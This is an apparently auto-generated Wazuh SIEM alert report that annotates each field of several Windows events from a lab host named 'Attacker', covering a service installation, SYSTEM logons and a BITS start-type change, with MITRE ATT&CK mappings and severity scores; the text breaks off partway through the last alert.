No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533890.142627
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-TPM-WMI
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {7d5387b0-cbe0-11da-a94d-0800200c9a66}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1796
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:55.0846511Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2913
Incremental log record number – handy for timeline order.

data.win.system.processID:  14920
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  3420
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The Secure Boot update failed to update a Secure Boot variable with error Secure Boot is not enabled on this machine.. For more information, please see https://go.microsoft.com/fwlink/?linkid=2169931"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hResult:  -2147020471
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

New Windows Service Created

🧠 What happened? New Windows Service Created

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:31:31.273+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:31.273+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New Windows Service Created
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61138
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533891.144212
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7045
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:59.3145318Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2915
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  13696
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "A service was installed in the system. Service Name: Google Updater Internal Service (GoogleUpdaterInternalService137.0.7129.0) Service File Name: "C:\Program Files (x86)\Google\GoogleUpdater\137.0.7129.0\updater.exe" --system --windows-service --service=update-internal Service Type: user mode service Service Start Type: auto start Service Account: LocalSystem"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.serviceName:  Google Updater Internal Service (GoogleUpdaterInternalService137.0.7129.0)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.imagePath:  \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update-internal
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.serviceType:  user mode service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.startType:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.accountName:  LocalSystem
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:32.597+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:32.597+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533892.146887
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:43:28.0949229Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43488
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10144
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:32.965+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:32.965+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533892.154225
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:43:57.0508466Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43490
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10144
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:33.170+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:33.170+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533893.161563
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:44:30.2946918Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2922
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  13636
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  Background Intelligent Transfer Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param2:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param3:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param4:  BITS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:33.209+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:33.209+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533893.163375
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
